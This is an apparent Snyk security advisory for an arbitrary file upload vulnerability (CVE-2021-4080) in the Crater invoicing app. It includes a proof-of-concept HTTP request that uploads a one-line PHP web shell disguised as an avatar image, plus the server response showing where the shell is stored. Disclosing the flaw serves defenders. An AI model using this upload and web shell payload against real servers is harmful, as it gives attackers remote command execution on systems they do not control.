Arbitrary File Upload Affecting bytefury/crater package, versions >=0.0.0
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.1% (41st
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-BYTEFURYCRATER-2338683
- published 13 Jan 2022
- disclosed 13 Jan 2022
- credit theworstcomrade
Introduced: 13 Jan 2022
CVE-2021-4080 Open this link in a new tabHow to fix?
A fix was pushed into the master branch but not yet published.
Overview
bytefury/crater is a Free & Open Source Invoice App for Individuals & Small Businesses. https://craterapp.com
Affected versions of this package are vulnerable to Arbitrary File Upload due to the possibility of the lowest privileged user to upload PHP file instead of avatar.
PoC:
POST /api/v1/me/upload-avatar HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------324661512726686552372889486730
Content-Length: 270
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/settings/account-settings
Cookie: XSRF-TOKEN=eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im13VlVJa1JyZWs4OWFLWlBBa0JobXc9PSIsInZhbHVlIjoiU21kVnR2Skc1UnZmSnR3SVhiL09qSFBmWGxGV0FMUi9pSzFSTkc2enBZL01GbkJBbCtiMzJmWnNLM3l2OWRJRVk0bUZ2dFRYTkVTWnRQV0xCNnkxbFdIOEJjS1E5N2dwRWNyNC90cHZRSTJaWHozcWNtcmo2RTltY2U0Q1ZEeXQiLCJtYWMiOiJmMzIxYTFiNjU2Y2QyOWM2ZDdiOWJiYzMyYjQ3NWFmZGM3NDU0ZTA0MjNhZjg0ZGEzZDgzZGFlMGEwMjQzMGJmIiwidGFnIjoiIn0%3D; D5zxaxhEVxptcHSFSkkLadY5LtUnr9yDLzGS8IGz=eyJpdiI6Im9jcVpRWkgzTTM2dzZjb3ZsQnlvTnc9PSIsInZhbHVlIjoiWXhGWk9CNlNpQUw2YVNuSWhtekF0TDUwbExybG1jM0tramgzWUlkbVJYa3hCcU1DbnFFbjhwWG5mNGpEU2RsSCtubHBQcXNadDhESDVFU0hZOVRtTFVudmFVRzRtemdMMWpKWm5LZ0JmckJQYnpndE9YQ3p1ZUF4SlRuaWJPWlJCK2hQMjM1QUlEaWo2b28raFh3VTRaN3J4aDdiS3AxSTNtUkJtOE5kT2VqY0d6ejUzZHc2THZhNVNSYVRpcmJ0YWM1L3crdDJSWUU2NlNDb0hUS0xYVWI0anJIOGJWOVIrcFpzWW8yZlF5RnhLZVJ2cFcvUHF6VUZQVkd6MXFtdm9ncWlFTE1QaVBHM1gvR1piVUZnZ0ovR2hFMWhJTUI0cDl5VVdCYUlQNVNKa1VlVGVoVW05dkg1R3pyUUNkRDFtTnBCaCt3UnBqNWpYVGFPN05JeHVGamF5SVJmYVdMdVY1QmRNeHo2R25BWDQ0ay9KRXhxTlZxWnJnYW5hZUdsdk1XeXQ2Mm9wdzJxSmNhbU9OMnNiUVBPaitYQ3F3VzE1amQ5Zm5xbGxuVE1ReUxiaDd4RVNuTkNuUVpyQmpWMldUb1lKNHdXWWJkR3plUjVOcWZKOW91WHhxNG1hMmJqVElMbTR3blJhdFpJalFUTS9mM3UraGZjdDRRL1Ura2c4Wmx2d1piaFRYMmN0Uk1mTFkvVEZRPT0iLCJtYWMiOiJmOGY0NTVmYmUxYTQ4NDI0YzJkN2UxOGM0NzEyZWMwODUwODE4YjllZjM1ZDE4OGMzNDg5NjI1ZDhjYzIwOThiIiwidGFnIjoiIn0%3D
-----------------------------324661512726686552372889486730
Content-Disposition: form-data; name="admin_avatar"; filename="shell.php"
Content-Type: image/svg+xml
<?php print_r(shell_exec($_GET[1])); ?>
-----------------------------324661512726686552372889486730--
// Response:
{
"data":
{
"id": 3,
"name": "user2",
"email": "user2-crater@zaqwsx.cc",
...
"avatar": "http:\/\/172.17.0.1:8888\/storage\/4\/shell.php",
"is_owner": false,
...
}
}